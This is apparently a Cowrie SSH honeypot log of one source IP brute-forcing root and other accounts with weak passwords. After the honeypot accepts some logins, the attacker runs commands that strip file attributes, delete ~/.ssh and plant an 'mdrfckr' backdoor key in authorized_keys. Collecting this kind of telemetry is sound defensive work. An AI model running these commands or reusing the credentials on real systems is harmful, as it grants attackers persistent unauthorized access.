{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:21.928371Z","src_ip":"212.227.235.229","session":"2c6b5ef460dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:22.027713Z","src_ip":"212.227.235.229","session":"2c6b5ef460dc"}
{"eventid":"cowrie.login.failed","username":"debian","password":"2025","message":"login attempt [debian/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:22.471435Z","src_ip":"212.227.235.229","session":"2c6b5ef460dc"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:23.573328Z","src_ip":"212.227.235.229","session":"2c6b5ef460dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33310,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf7f84e90023","protocol":"ssh","message":"New connection: 212.227.235.229:33310 (1.2.3.4:22) [session: cf7f84e90023]","sensor":"my-vps","timestamp":"2025-09-08T23:03:26.042601Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:26.043759Z","src_ip":"212.227.235.229","session":"cf7f84e90023"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:26.140402Z","src_ip":"212.227.235.229","session":"cf7f84e90023"}
{"eventid":"cowrie.login.failed","username":"gpadmin","password":"1234567890","message":"login attempt [gpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:26.525522Z","src_ip":"212.227.235.229","session":"cf7f84e90023"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:27.624062Z","src_ip":"212.227.235.229","session":"cf7f84e90023"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47506,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fc74d961209","protocol":"ssh","message":"New connection: 212.227.235.229:47506 (1.2.3.4:22) [session: 4fc74d961209]","sensor":"my-vps","timestamp":"2025-09-08T23:03:38.763854Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38328,"dst_ip":"1.2.3.4","dst_port":22,"session":"037ec39cc47c","protocol":"ssh","message":"New connection: 212.227.235.229:38328 (1.2.3.4:22) [session: 037ec39cc47c]","sensor":"my-vps","timestamp":"2025-09-08T23:03:40.510904Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:40.548294Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:40.787735Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.login.success","username":"root","password":"Ff123456@","message":"login attempt [root/Ff123456@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:41.773921Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:42.348451Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:42.349261Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:42.350375Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:42.537483Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:43.054450Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:03:43.055286Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:03:43.275805Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:43.276792Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39406,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ccb30d28303","protocol":"ssh","message":"New connection: 212.227.235.229:39406 (1.2.3.4:22) [session: 7ccb30d28303]","sensor":"my-vps","timestamp":"2025-09-08T23:03:43.510713Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:43.532990Z","src_ip":"212.227.235.229","session":"7ccb30d28303"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:43.776730Z","src_ip":"212.227.235.229","session":"7ccb30d28303"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:03:44.770622Z","src_ip":"212.227.235.229","session":"7ccb30d28303"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:46.051994Z","src_ip":"212.227.235.229","session":"7ccb30d28303"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40496,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a8e81189f4e","protocol":"ssh","message":"New connection: 212.227.235.229:40496 (1.2.3.4:22) [session: 2a8e81189f4e]","sensor":"my-vps","timestamp":"2025-09-08T23:03:46.260919Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:46.288639Z","src_ip":"212.227.235.229","session":"2a8e81189f4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:46.533047Z","src_ip":"212.227.235.229","session":"2a8e81189f4e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:47.531326Z","src_ip":"212.227.235.229","session":"2a8e81189f4e"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:47.776793Z","src_ip":"212.227.235.229","session":"037ec39cc47c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:47.777836Z","src_ip":"212.227.235.229","session":"2a8e81189f4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53354,"dst_ip":"1.2.3.4","dst_port":22,"session":"27fb52852a0b","protocol":"ssh","message":"New connection: 212.227.235.229:53354 (1.2.3.4:22) [session: 27fb52852a0b]","sensor":"my-vps","timestamp":"2025-09-08T23:03:53.860762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:53.861518Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:54.197001Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51740,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7ea920a5009","protocol":"ssh","message":"New connection: 212.227.235.229:51740 (1.2.3.4:22) [session: e7ea920a5009]","sensor":"my-vps","timestamp":"2025-09-08T23:03:55.121372Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:03:55.122157Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:03:55.384245Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.login.success","username":"root","password":"123456xx","message":"login attempt [root/123456xx] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:55.580030Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:56.312897Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:56.313992Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:56.314816Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazxsw@","message":"login attempt [root/1qazxsw@] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:03:56.443213Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:56.651614Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:56.967097Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:56.967898Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:03:56.968847Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:57.223918Z","src_ip":"212.227.235.229","session":"e7ea920a5009"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:03:57.389013Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:03:57.389746Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:03:57.727548Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:03:57.728481Z","src_ip":"212.227.235.229","session":"27fb52852a0b"}
